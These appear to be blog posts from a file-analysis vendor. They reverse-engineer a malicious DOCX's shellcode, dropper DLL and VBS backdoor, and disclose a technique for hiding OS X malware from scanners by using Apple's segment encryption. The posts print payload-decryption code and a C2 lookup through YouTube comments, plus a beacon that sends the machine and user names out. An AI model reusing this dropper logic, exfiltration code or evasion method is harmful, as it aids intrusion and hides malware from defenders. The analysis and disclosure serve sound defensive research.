0000001C  EAB63BB8 ; Thread32First
00000020  08D6FE86 ; Thread32Next
00000024  DC2C8C0E ; SuspendThread
00000028  6F1EC958 ; OpenThread
0000002C  9EF9BB35 ; GetCurrentThreadId
00000030  8E4E0EEC ; LoadLibraryA
00000034  A0D5C94D ; FreeLibrary
00000038  AC08DA76 ; SetFilePointer
0000003C  AD9B7DDF ; GetFileSize
00000040  54CAAF91 ; VirtualAlloc
00000044  1665FA10 ; ReadFile

We can actually close the debugger now. Once the API names are known, it’s easy to continue the analysis statically.

The next step in the shellcode is to suspend all other threads in the current process:

; suspend all threads in the current process
00001062:  call dword ptr [esi+0x14]       ; GetCurrentProcessId
00001065:  mov ebx, eax
00001067:  call dword ptr [esi+0x2c]       ; GetCurrentThreadId
0000106A:  push eax
0000106B:  sub esp, 0x1c
0000106E:  xor eax, eax
00001070:  push eax
00001071:  push 0x4
00001073:  call dword ptr [esi+0x18]       ; CreateToolhelp32Snapshot
00001076:  cmp eax, 0xffffffff
00001079:  jz 0x10bf
0000107B:  mov edi, esp
0000107D:  mov dword ptr [edi], 0x1c
00001083:  push eax
00001084:  mov eax, dword ptr [esp]
00001087:  push edi
00001088:  push eax
00001089:  call dword ptr [esi+0x1c]       ; Thread32First
0000108C:  test eax, eax
0000108E:  jz 0x10bc
00001090:  mov eax, dword ptr [edi+0xc]
00001093:  cmp eax, ebx
00001095:  jnz 0x10b0
00001097:  mov eax, dword ptr [edi+0x8]
0000109A:  cmp eax, dword ptr [esp+0x20]
0000109E:  jz 0x10b0
000010A0:  push eax
000010A1:  xor eax, eax
000010A3:  push eax
000010A4:  push 0x1fffff
000010A9:  call dword ptr [esi+0x28]       ; OpenThread
000010AC:  push eax
000010AD:  call dword ptr [esi+0x24]       ; SuspendThread
000010B0:  mov eax, dword ptr [esp]
000010B3:  push edi
000010B4:  push eax
000010B5:  call dword ptr [esi+0x20]       ; Thread32Next
000010B8:  test eax, eax
000010BA:  jnz 0x1090
000010BC:  call dword ptr [esi+0xc]        ; CloseHande

It then looks for the handle in the current process for the main DOCX file:

; find handle to the current docx:
; it sets the file pointer to 0x20 and reads 4 bytes, it compares them to 0x6f725063
; here's the hex view of the initial bytes:
;
; Offset     0  1  2  3  4  5  6  7    8  9  A  B  C  D  E  F     Ascii   
;
; 00000000  50 4B 03 04 14 00 06 00   08 00 00 00 21 00 56 0B     PK..........!.V.
; 00000010  6D 97 7C 01 00 00 CE 02   00 00 10 00 08 01 64 6F     m.|...........do
; 00000020  63 50 72 6F                                           cPro
;           
000010BF:  xor ebx, ebx
000010C1:  add ebx, 0x4
000010C4:  cmp ebx, 0x100000
000010CA:  jnbe 0x1155
000010D0:  xor eax, eax
000010D2:  push eax
000010D3:  push eax
000010D4:  mov al, 0x20
000010D6:  push eax
000010D7:  push ebx
000010D8:  call dword ptr [esi+0x38]       ; SetFilePointer
000010DB:  cmp eax, 0xffffffff
000010DE:  jz 0x10c1
000010E0:  xor eax, eax
000010E2:  push eax
000010E3:  push ebx
000010E4:  call dword ptr [esi+0x3c]       ; GetFileSize
000010E7:  cmp eax, 0x1000
000010EC:  jl 0x10c1
000010EE:  mov edi, eax
000010F0:  sub esp, 0x4
000010F3:  mov ecx, esp
000010F5:  sub esp, 0x4
000010F8:  mov edx, esp
000010FA:  xor eax, eax
000010FC:  push eax
000010FD:  push ecx
000010FE:  push 0x4
00001100:  push edx
00001101:  push ebx
00001102:  call dword ptr [esi+0x44]      ; ReadFile
00001105:  test eax, eax
00001107:  pop eax
00001108:  pop ecx
00001109:  jz 0x10c1
0000110B:  cmp eax, 0x6f725063
00001110:  jnz 0x10c1

It reads the entire file (minus the first 0x24 bytes) into memory and looks for a certain signature:

; read the entire file apart the first 0x24 bytes
00001112:  sub edi, 0x24                  ; subtract from files size the initial bytes
00001115:  push 0x4
00001117:  push 0x3000
0000111C:  push edi
0000111D:  push 0x0
0000111F:  call dword ptr [esi+0x40]      ; VirtualAlloc
00001122:  sub esp, 0x4
00001125:  mov ecx, esp
00001127:  push 0x0
00001129:  push ecx
0000112A:  push edi
0000112B:  push eax
0000112C:  mov edi, eax                   ; edi = buffer
0000112E:  push ebx
0000112F:  call dword ptr [esi+0x44]      ; ReadFile
00001132:  test eax, eax
00001134:  pop edx
00001135:  jz 0x1155

; find 0xb19b00b5 in the buffer
00001137:  mov eax, 0xb19b00b5
0000113C:  inc edi
0000113D:  dec edx
0000113E:  test edx, edx
00001140:  jle 0x1155
00001142:  cmp dword ptr [edi], eax
00001144:  jnz 0x113c
00001146:  add edi, 0x4                   ; buffer += 4
00001149:  sub edx, 0x4
0000114C:  cmp dword ptr [edi], eax       ; repeat compare
0000114E:  jnz 0x113c
00001150:  add edi, 0x4                   ; buffer += 4
00001153:  jmp 0x119f                     ; jump to decryption
00001155:  mov bx, cs
00001158:  cmp bl, 0x23
0000115B:  jnz 0x1163
0000115D:  xor edx, edx
0000115F:  push edx
00001160:  push edx
00001161:  push edx
00001162:  push edx
00001163:  mov edx, 0xfffff
00001168:  or dx, 0xfff
0000116D:  inc edx
0000116E:  push edx
0000116F:  cmp bl, 0x23
00001172:  jz 0x118d
00001174:  push 0x2
00001176:  pop eax
00001177:  int 0x2e
00001179:  pop edx
0000117A:  cmp al, 0x5
0000117C:  jz 0x1168
0000117E:  mov eax, 0xb19b00b5
00001183:  mov edi, edx
00001185:  scasd dword ptr [edi]
00001186:  jnz 0x116d
00001188:  scasd dword ptr [edi]
00001189:  jnz 0x116d
0000118B:  jmp 0x119f
0000118D:  push 0x26
0000118F:  pop eax
00001190:  xor ecx, ecx
00001192:  mov edx, esp
00001194:  call dword ptr fs:[0xc0]
0000119B:  pop ecx
0000119C:  pop edx
0000119D:  jmp 0x117a

It creates a new file in the temp directory:

0000119F:  sub esp, 0xfc
000011A5:  mov ebx, esp
000011A7:  push ebx
000011A8:  push 0xfc
000011AD:  call dword ptr [esi]            ; GetTempPathA
000011AF:  mov dword ptr [ebx+eax*1], 0x6c2e61
000011B6:  xor eax, eax
000011B8:  push eax
000011B9:  push 0x2
000011BB:  push 0x2
000011BD:  push eax
000011BE:  push eax
000011BF:  push 0x40000000
000011C4:  push ebx
000011C5:  call dword ptr [esi+0x8]        ; CreateFileA
000011C8:  mov edx, eax
000011CA:  push edx
000011CB:  push edx
000011CC:  push ebx

Now comes the juicy part. It reads few parameters after the matched signature, including a size parameter, and uses these parameters to decrypt a region of data:

; read decryption parameters
000011CD:  mov al, byte ptr [edi]
000011CF:  inc edi
000011D0:  mov bl, byte ptr [edi]
000011D2:  inc edi
000011D3:  mov ecx, dword ptr [edi]
000011D5:  push ecx
000011D6:  add edi, 0x4
000011D9:  push edi
; decryption loop
000011DA:  mov dl, byte ptr [edi]
000011DC:  xor dl, al
000011DE:  mov byte ptr [edi], dl
000011E0:  inc edi
000011E1:  add al, bl
000011E3:  dec ecx
000011E4:  test ecx, ecx
000011E6:  jnz 0x11da

Let’s select in the hex view the same region (we find the start address by looking for the signature just as the shellcode does).

Encrypted payload

Then we press Ctrl+E to add an embedded file and we click on filters. Since the decryption routine is too complex to be expressed through a simple filter, we have finally a good reason to use a Lua filter, in particular the ‘lua/custom‘ one.

Lua custom filter

As you can see, a sample stub is already provided when clicking on the script value in the options. We have to modify it only slightly for our purposes.

function run(filter)
    local c = filter:container()
    local size = c:size()
    local offset = 0
    local bsize = 16384
    local al = 0x3A
    local bl = 0x9E
    while size ~= 0 do
        if bsize > size then bsize = size end
        local block = c:read(offset, bsize)
        local boffs = 0
        while boffs < bsize do
            local dl = block:readU8(boffs)
            dl = bit.bxor(dl, al)
            block:writeU8(boffs, dl)
            boffs = boffs + 1
            al = bit.band(al + bl, 0xFF)
        end
        c:write(offset, block)
        offset = offset + bsize
        size = size - bsize
    end
    return Base.FilterErr_None
end

By clicking on preview, we can see that the file start with a typical MZ header. Thus, we can specify a PE file when loading the payload.

PE payload

By inspecing the PE file we can see that it's a DLL among other things. Now, before analyzing the DLL, let's finish the shellcode analysis.

The payload is now decrypted. So the shellcode just writes it to the temporary file, loads the DLL, unloads it and then terminates the current thread.

000011E8:  pop edi
000011E9:  pop ecx
000011EA:  pop ebx
000011EB:  pop edx
000011EC:  sub esp, 0x4
000011EF:  mov eax, esp
000011F1:  push 0x0
000011F3:  push eax
000011F4:  push ecx
000011F5:  push edi
000011F6:  push edx
000011F7:  call dword ptr [esi+0x10]       ; WriteFile
000011FA:  pop eax
000011FB:  call dword ptr [esi+0xc]        ; CloseHande
000011FE:  push ebx
000011FF:  call dword ptr [esi+0x30]       ; LoadLibraryA
00001202:  push eax
00001203:  call dword ptr [esi+0x34]       ; FreeLibrary
00001206:  xor eax, eax
00001208:  push eax
00001209:  push eax
0000120A:  call dword ptr [esi+0x4]        ; FreeLibraryAndExitThread

That's it. Now we can go back to the payload dll.

One of the resources embedded in the PE file is a DOCX.

Payload DOCX

Probably a sane document to re-open in a reader to avoid making the user suspicious of a document which didn't open.

There's another suspicious embedded resource, but before making hypotheisis about it, let's do a complete analysis of the DLL, (don't worry: it's very small). For this purpose I used IDA Pro and the decompiler.

It starts with the DllMain:

BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  if ( fdwReason == 1 )
    sub_10001030(hinstDLL);
  return 1;
}

The called function:

HRSRC __cdecl sub_10001030(HMODULE hModule)
{
  HRSRC result; // eax@6
  HRSRC hResInfo; // [sp+0h] [bp-10h]@1
  HRSRC hResInfoa; // [sp+0h] [bp-10h]@6
  HGLOBAL hResData; // [sp+4h] [bp-Ch]@2
  void *hResDataa; // [sp+4h] [bp-Ch]@7
  const void *lpBuffer; // [sp+8h] [bp-8h]@3
  const void *lpBuffera; // [sp+8h] [bp-8h]@8
  DWORD nNumberOfBytesToWrite; // [sp+Ch] [bp-4h]@3
  DWORD nNumberOfBytesToWritea; // [sp+Ch] [bp-4h]@8

  hResInfo = FindResourceA(hModule, "ID_RES1", (LPCSTR)0xA);
  if ( hResInfo )
  {
    hResData = LoadResource(hModule, hResInfo);
    if ( hResData )
    {
      nNumberOfBytesToWrite = SizeofResource(hModule, hResInfo);
      lpBuffer = LockResource(hResData);
      if ( lpBuffer )
        sub_10001200(lpBuffer, nNumberOfBytesToWrite);
      FreeResource(hResData);
    }
  }
  result = FindResourceA(hModule, "ID_RES2", (LPCSTR)0xA);
  hResInfoa = result;
  if ( result )
  {
    result = LoadResource(hModule, result);
    hResDataa = result;
    if ( result )
    {
      nNumberOfBytesToWritea = SizeofResource(hModule, hResInfoa);
      lpBuffera = LockResource(hResDataa);
      if ( lpBuffera )
        sub_10001120(lpBuffera, nNumberOfBytesToWritea);
      result = (HRSRC)FreeResource(hResDataa);
    }
  }
  return result;
}

It basically retrieves both embedded resources and then performs some stuff with both of them. First we take a look at what it does with the DOCX resource:

char *__cdecl sub_10001200(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
{
  char *result; // eax@10
  int hObject; // [sp+0h] [bp-63Ch]@1
  void *hObjecta; // [sp+0h] [bp-63Ch]@20
  DWORD Type; // [sp+4h] [bp-638h]@1
  int Buffer; // [sp+8h] [bp-634h]@6
  const CHAR CmdLine; // [sp+Ch] [bp-630h]@21
  DWORD cbData; // [sp+210h] [bp-42Ch]@1
  const CHAR ExistingFileName; // [sp+214h] [bp-428h]@19
  LPCSTR lpNewFileName; // [sp+31Ch] [bp-320h]@11
  DWORD NumberOfBytesWritten; // [sp+320h] [bp-31Ch]@4
  CHAR Filename; // [sp+324h] [bp-318h]@21
  HKEY hKey; // [sp+524h] [bp-118h]@9
  DWORD v14; // [sp+528h] [bp-114h]@4
  BYTE Data; // [sp+52Ch] [bp-110h]@10
  unsigned int v16; // [sp+634h] [bp-8h]@1
  char *v17; // [sp+638h] [bp-4h]@19
  int v18; // [sp+63Ch] [bp+0h]@1

  v16 = (unsigned int)&v18 ^ __security_cookie;
  cbData = 260;
  Type = 1;
  hObject = 0;
  while ( 1 )
  {
    hObject += 4;
    if ( hObject > 1048576 )
      break;
    if ( SetFilePointer((HANDLE)hObject, 32, 0, 0) != -1 )
    {
      v14 = GetFileSize((HANDLE)hObject, &NumberOfBytesWritten);
      if ( v14 != -1 )
      {
        if ( (signed int)v14 >= 4096
          && ReadFile((HANDLE)hObject, &Buffer, 4u, &NumberOfBytesWritten, 0)
          && Buffer == 1869762659 )
          break;
      }
    }
  }
  if ( RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Office\\12.0\\Word\\File MRU", 0, 0x20019u, &hKey) )
  {
    result = (char *)sub_10001530(hObject, (char *)&Data);
    if ( result )
      return result;
    lpNewFileName = (LPCSTR)&Data;
  }
  else
  {
    if ( RegQueryValueExA(hKey, "Item 1", 0, &Type, &Data, &cbData) )
    {
      result = (char *)sub_10001530(hObject, (char *)&Data);
      if ( result )
        return result;
      lpNewFileName = (LPCSTR)&Data;
    }
    else
    {
      RegCloseKey(hKey);
      lpNewFileName = strchr((const char *)&Data, '*');
      if ( lpNewFileName )
      {
        ++lpNewFileName;
      }
      else
      {
        result = (char *)sub_10001530(hObject, (char *)&Data);
        if ( result )
          return result;
        lpNewFileName = (LPCSTR)&Data;
      }
    }
  }
  CloseHandle((HANDLE)hObject);
  DeleteFileA(lpNewFileName);
  GetTempPathA(0x104u, (LPSTR)&ExistingFileName);
  result = strrchr(lpNewFileName, '\\');
  v17 = result;
  if ( result )
  {
    ++v17;
    strcat((char *)&ExistingFileName, v17);
    result = (char *)CreateFileA(&ExistingFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
    hObjecta = result;
    if ( result != (char *)-1 )
    {
      WriteFile(result, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
      CloseHandle(hObjecta);
      GetModuleFileNameA(0, &Filename, 0x200u);
      sprintf((char *)&CmdLine, "%s /q /t \"%s\"", &Filename, &ExistingFileName);
      WinExec(&CmdLine, 5u);
      result = (char *)CopyFileA(&ExistingFileName, lpNewFileName, 0);
    }
  }
  return result;
}

As hypothized previously, it just launches a new instance of the current process with the sane DOCX this time.

Now let's take a look at what it does with the resource we haven't yet identified:

HANDLE __cdecl sub_10001120(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
{
  HANDLE result; // eax@1
  const CHAR Parameters; // [sp+0h] [bp-210h]@1
  HANDLE hObject; // [sp+100h] [bp-110h]@1
  DWORD NumberOfBytesWritten; // [sp+104h] [bp-10Ch]@2
  CHAR Directory; // [sp+108h] [bp-108h]@1
  unsigned int v7; // [sp+20Ch] [bp-4h]@1
  int v8; // [sp+210h] [bp+0h]@1

  v7 = (unsigned int)&v8 ^ __security_cookie;
  GetTempPathA(0x100u, &Directory);
  GetTempPathA(0x100u, (LPSTR)&Parameters);
  strcat((char *)&Parameters, "1.vbe");
  result = CreateFileA(&Parameters, 0x40000000u, 0, 0, 2u, 2u, 0);
  hObject = result;
  if ( result != (HANDLE)-1 )
  {
    WriteFile(hObject, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
    CloseHandle(hObject);
    result = ShellExecuteA(0, "open", "cscript.exe", &Parameters, &Directory, 0);
  }
  return result;
}

It dumps it to file (with a vbe extension) and then executes it with 'cscript.exe'. I actually didn't know about VBE files: they're just encoded VBS files. To decode it I used an online tool by GreyMagic.

VBE resource

The VBS code is quite easy to read and quite boring. The only interesting part in my opinion is the update mechanism.

It basically looks for certain comments in two YouTube pages with a regex. The url captured by the regex is then used to perform the update.

Dim YouTubeLinks(1)
YouTubeLinks(0) = "http://www.youtube.com/watch?v=DZZ3tTTBiTs"
YouTubeLinks(1) = "http://www.youtube.com/watch?v=ky4M9kxUM7Y"

Rem [...]

	while serverExists = 0
		Dim min, max
		min = 0
		max = 1
		Randomize
		
		randLink = YouTubeLinks(Int((max-min+1)*Rnd+min))
		
		outputHTML = getPage(randLink, 60)
		
		Set objRE = New RegExp
		With objRE
			.Pattern = "just something i made up for fun, check out my website at (.*) bye bye"
			.IgnoreCase = True
		End With

		Set objMatch = objRE.Execute( outputHTML )

		If objMatch.Count = 1 Then
			server = objMatch.Item(0).Submatches(0)
		End If
		
		server = "http://" & server
		
		if getPage(server & "/Status.php", 30) = "OK" Then
			serverExists = 1
		End if
	Wend

It sends back to the URL various information about the current machine:

	up = getPage(server & "/Up.php?sn=" & Serial & "&v=" & version & "&av=" & installedAV, 60)
Else
	while Len(Serial) <> 5
		getSerial = getPage(server & "/gsn.php?new=" & computerName & ":" & userName & "&v=" & version & "&av=" & installedAV, 60)

As a final anecdote: the main part of the script just contains an enormous byte array which is dumped to file. The file is a PNG with a RAR file appended to it which in turn contains a VBE encoding executable. The script itself doesn't seem to make use of this, so no idea why it's there.

Appended RAR

That's all. While it may seem a lot of work, writing the article took much longer than performing the actual analysis (~30 minutes, including screenshots).

We hope it may be of help or interest to someone.

Disclosure: Creating undetected malware for OS X

While this PoC is about static analysis, it’s very different than applying a packer to a malware. OS X uses an internal mechanism to load encrypted Apple executables and we’re going to exploit the same mechanism to defeat current anti-malware solutions.

OS X implements two encryption systems for its executables (Mach-O). The first one is implemented through the LC_ENCRYPTION_INFO loader command. Here’s the code which handles this command:

            case LC_ENCRYPTION_INFO:
                if (pass != 3)
                    break;
                ret = set_code_unprotect(
                    (struct encryption_info_command *) lcp,
                    addr, map, slide, vp);
                if (ret != LOAD_SUCCESS) {
                    printf("proc %d: set_code_unprotect() error %d "
                           "for file \"%s\"\n",
                           p->p_pid, ret, vp->v_name);
                    /* Don't let the app run if it's
                     * encrypted but we failed to set up the
                     * decrypter */
                     psignal(p, SIGKILL);
                }
                break;

This code calls the set_code_unprotect function which sets up the decryption through text_crypter_create:

    /* set up decrypter first */
    kr=text_crypter_create(&crypt_info, cryptname, (void*)vpath);

The text_crypter_create function is actually a function pointer registered through the text_crypter_create_hook_set kernel API. While this system can allow for external components to register themselves and handle decryption requests, we couldn’t see it in use on current versions of OS X.

The second encryption mechanism which is actually being used internally by Apple doesn’t require a loader command. Instead, it signals encrypted segments through a flag.

Protected flag

The ‘PROTECTED‘ flag is checked while loading a segment in the load_segment function:

if (scp->flags & SG_PROTECTED_VERSION_1) {
    ret = unprotect_segment(scp->fileoff,
                scp->filesize,
                vp,
                pager_offset,
                map,
                map_addr,
                map_size);
} else {
    ret = LOAD_SUCCESS;
}

The unprotect_segment function sets up the range to be decrypted, the decryption function and method. It then calls vm_map_apple_protected.

#define APPLE_UNPROTECTED_HEADER_SIZE   (3 * PAGE_SIZE_64)

static load_return_t
unprotect_segment(
    uint64_t    file_off,
    uint64_t    file_size,
    struct vnode        *vp,
    off_t               macho_offset,
    vm_map_t    map,
    vm_map_offset_t     map_addr,
    vm_map_size_t       map_size)
{
    kern_return_t       kr;
    /*
     * The first APPLE_UNPROTECTED_HEADER_SIZE bytes (from offset 0 of
     * this part of a Universal binary) are not protected...
     * The rest needs to be "transformed".
     */
    if (file_off <= APPLE_UNPROTECTED_HEADER_SIZE &&
        file_off + file_size <= APPLE_UNPROTECTED_HEADER_SIZE) {
        /* it's all unprotected, nothing to do... */
        kr = KERN_SUCCESS;
    } else {
        if (file_off <= APPLE_UNPROTECTED_HEADER_SIZE) {
            /*
             * We start mapping in the unprotected area.
             * Skip the unprotected part...
             */
            vm_map_offset_t     delta;
            delta = APPLE_UNPROTECTED_HEADER_SIZE;
            delta -= file_off;
            map_addr += delta;
            map_size -= delta;
        }
        /* ... transform the rest of the mapping. */
        struct pager_crypt_info crypt_info;
        crypt_info.page_decrypt = dsmos_page_transform;
        crypt_info.crypt_ops = NULL;
        crypt_info.crypt_end = NULL;
#pragma unused(vp, macho_offset)
        crypt_info.crypt_ops = (void *)0x2e69cf40;
        kr = vm_map_apple_protected(map,
                        map_addr,
                        map_addr + map_size,
                        &crypt_info);
    }
    if (kr != KERN_SUCCESS) {
        return LOAD_FAILURE;
    }
    return LOAD_SUCCESS;
}

Two things about the code above. The first 3 pages (0x3000) of a Mach-O can't be encrypted/decrypted. And, as can be noticed, the decryption function is dsmos_page_transform.

Just like text_crypter_create even dsmos_page_transform is a function pointer which is set through the dsmos_page_transform_hook kernel API. This API is called by the kernel extension "Dont Steal Mac OS X.kext", allowing for the decryption logic to be contained outside of the kernel in a private kernel extension by Apple.

Apple uses this technology to encrypt some of its own core components like "Finder.app" or "Dock.app". On current OS X systems this mechanism doesn't provide much of a protection against reverse engineering in the sense that attaching a debugger and dumping the memory is sufficient to retrieve the decrypted executable.

However, this mechanism can be abused by encrypting malware which will no longer be detected by the static analysis technologies of current security solutions.

To demonstrate this claim we took a known OS X malware:

Scan before encryption

Since this is our public disclosure, we will say that the detection rate stood at about 20-25.

And encrypted it:

Scan after encryption

After encryption has been applied, the malware is no longer detected by scanners at VirusTotal. The problem is that OS X has no problem in loading and executing the encrypted malware.

The difference compared to a packer is that the decryption code is not present in the executable itself and so the static analysis engine can't recognize a stub or base itself on other data present in the executable, since all segments can be encrypted. Thus, the scan engine also isn't able to execute the encrypted code in its own virtual machine for a more dynamic analysis.

Two other important things about the encryption system is that the private key is the same and is shared across different versions of OS X. And it's not a chained encryption either: but per-page. Which means that changing data in the first encrypted page doesn't affect the second encrypted page and so on.

Our flagship product, Cerbero Profiler, which is an interactive file analysis infrastructure, is able to decrypt protected executables. To dump an unprotected copy of the Mach-O just perform a “Select all” (Ctrl+A) in the main hex view and then click on “Copy into new file” like in the screen-shot below.

Mach-O decryption

The saved file can be executed on OS X or inspected with other tools.

Decrypted Mach-O

Of course, the decryption can be achieved programmatically through our Python SDK as well. Just load the Mach-O file, initialize it (ProcessLoadCommands) and save to disk the stream returned by the GetStream.

A solution to mitigate this problem could be one of the following:

  • Implement the decryption mechanism like we did.
  • Check the presence of encrypted segments. If they are present, trust only executables with a valid code signature issued by Apple.
  • 3. Check the presence of encrypted segments. If they are present, trust only executables whose cryptographic hash matches a trusted one.

This kind of internal protection system should be avoided in an operating system, because it can be abused.

After we shared our internal report, VirusBarrier Team at Intego sent us the following previous research about Apple Binary Protection:

http://osxbook.com/book/bonus/chapter7/binaryprotection/
http://osxbook.com/book/bonus/chapter7/tpmdrmmyth/
https://github.com/AlanQuatermain/appencryptor

The research talks about the old implementation of the binary protection. The current page transform hook looks like this:

  if (v9 == 0x2E69CF40) // this is the constant used in the current kernel
  {
    // current decryption algo
  }
  else
  {
    if (v9 != 0xC2286295)
    {
      // ...
      if (!some_bool)
      {
        printf("DSMOS++: WARNING -- Old Kernel\n");
        ++some_bool;
      }
    }
    // old decryption algo
  }

VirusBarrier Team also reported the following code by Steve Nygard in his class-dump utility:

https://bitbucket.org/nygard/class-dump/commits/5908ac605b5dfe9bfe2a50edbc0fbd7ab16fd09c

This is the correct decryption code. In fact, the kernel extension by Apple, just as in the code above provided by Steve Nygard, uses the OpenSSL implementation of Blowfish.

We didn't know about Nygard's code, so we did our own research about the topic and applied it to malware. We would like to thank VirusBarrier Team at Intego for its cooperation and quick addressing of the issue. At the time of writing we're not aware of any security solution for OS X, apart VirusBarrier, which isn't tricked by this technique. We even tested some of the most important security solutions individually on a local machine.

The current 0.9.9 version of Cerbero Profiler already implements the decryption of Mach-Os, even though it's not explicitly written in the changelist.

We didn't implement the old decryption method, because it didn't make much sense in our case and we're not aware of a clean way to automatically establish whether the file is old and therefore uses said encryption.

These two claims need a clarification. If we take a look at Nygard's code, we can see a check to establish the encryption method used:

#define CDSegmentProtectedMagic_None 0
#define CDSegmentProtectedMagic_AES 0xc2286295
#define CDSegmentProtectedMagic_Blowfish 0x2e69cf40

            if (magic == CDSegmentProtectedMagic_None) {
                // ...
            } else if (magic == CDSegmentProtectedMagic_Blowfish) {
                // 10.6 decryption
                // ...
            } else if (magic == CDSegmentProtectedMagic_AES) {
                // ...
            }

It checks the first dword in the encrypted segment (after the initial three non-encrypted pages) to decide which decryption algorithm should be used. This logic has a problem, because it assumes that the first encrypted block is full of 0s, so that when encrypted with AES it produces a certain magic and when encrypted with Blowfish another one. This logic fails in the case the first block contains values other than 0. In fact, some samples we encrypted didn't produce a magic for this exact reason.

Also, current versions of OS X don't rely on a magic check and don't support AES encryption. As we can see from the code displayed at the beginning of the article, the kernel doesn't read the magic dword and just sets the Blowfish magic value as a constant:

        crypt_info.crypt_ops = (void *)0x2e69cf40;

So while checking the magic is useful for normal cases, security solutions can't rely on it or else they can be easily tricked into using the wrong decryption algorithm.

If your organization wishes to be informed by us in the future before public disclosure about findings & issues, it can contact us and become a technical partner for free.

Creating undetected malware for OS X

We have discovered a way to defeat current anti-malware solutions. We will publicly disclose the full details of the issue in a few weeks.

In the meantime, we’re more than happy to confidentially disclose the information with interested organizations (either security vendors or known companies which could benefit from it). Just send an email to: info@icerbero.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBE1j8U0BCACm3tMNVVDb4gIEGdPYq3le5gzBngN43J7SXvGH6nlDnG6s/zS1
lBtecoqvtgXlS9KDonzq4KR0AfcEQh8ziwCgRbkgfQUxyIvJxt+cxW2zblnP37UQ
AuwhqO/Sc1yG3cT8wFSoaiF+tXJca879WEvimTyaoZSlXb3JuKt4UmDYbrOSLfDL
vd1rJ59R7GE5B2ThnSKDU/8pSvYVMKJdq0ArM8Nwg7gmUaBwpsvtEaGFB0gh3kBv
C/clsY8MR+MOBVI2f+95kekLIrUmOKzjXp5GkTgt5a6hqobU8jkVixN/KqgnT4Aj
LGPIyZkKgo/735SCT0JuWJKSHqJ+tw4aYUt7ABEBAAG0HkNlcmJlcm8gVUcgPGlu
Zm9AaWNlcmJlcm8uY29tPokBPgQTAQIAKAUCTWPxTQIbIwUJCWYBgAYLCQgHAwIG
FQgCCQoLBBYCAwECHgECF4AACgkQO3RcR15Gr56YXQf7BIKai3Y2i1xz4KAXfWmP
bsfuzHV4ZSsx8o1rnihtmXfN6qbPR1ySEfP/XgRXLZ2coerMYtx/Ydr4KnXlD1Sa
K7rGdTpqlwZ46p9RqtliFGELeglmHzD5ZCxawmHXf14OvTFgJKYqztFjBOvYMthI
xn5hdx/AqixCky5BMjdh7909cUP5Xzi0oYlpHcmiBsdPx8LPMh+DqGg9W0iahgnd
X+E0dW0dOEpg101esGMsHGaSbxw0+5ybh8XCIAl/50GLCVQWSE/8hxJnNoQy3AI/
P/d2olyGFVYbFVm+MUoRpx0zWgGP90n/Q9toGwl4qhhviyEl6vg6syYTuruhRcx7
D7kBDQRNY/FNAQgAskW9XYOXUd+DnEqGJywltTDpxSwwpCrfnqJG90YimVkK396G
ZG8uI5AnGqJ/+gThvgAMTY826WwlDP3DOyhmv1Iq7hKXDh9w2O5q8a1nsdaiGKws
7RBJ04xgfciifZRueGdEioiAFS5YmDLjdrBh6rX+6UfXTkbv1x1qodn1R9wFPxxS
nadpKwskG4YszNeViJxHMZTmnuKH9AOvCH7qiyWERNejeLRy1yFXVwD2HnCEjCNT
Loa3HvO5aJDT4Lww/w0McLPU0Tso5qQlXKk/I0C/llGD87rzuDffBswPQYfn2FkI
bHT5wdYh8Si+tA0oLI/bjRO254iFHDVgT/Vm3wARAQABiQElBBgBAgAPBQJNY/FN
AhsMBQkJZgGAAAoJEDt0XEdeRq+e+D4H/0W4oPHGv04y6KcuAR7XbgoXQ5fJVghY
XeKuYXD95WMT3W3PyoCirst9dX1MeJJ/wxi7dBCjT0iBbeb7mDERBQLi7L3hJnpg
wz1tokLb0QL+HNKIYZ8PsuuW3yQsbjSu1hCsCqNFe9nY3wkEDa3TWjjk5i1ejnnb
PCvGTOO/siwXGgZq7YWvoafCsdgbAwW8G6pO9BjZrrbDMMgFtQLWHLNBzDHTpWL3
BqjLlYisENQAO63FSAcu1ubhzFtIcVsjW8cgAxHQy4nN2RJHv23il+/PLsHquElP
gG4qSk8PudeEQUhFLLANRCSQ5yYlBhv4hJGGdAvYvYZQC36Nljg5WHI=
=SD9C
-----END PGP PUBLIC KEY BLOCK-----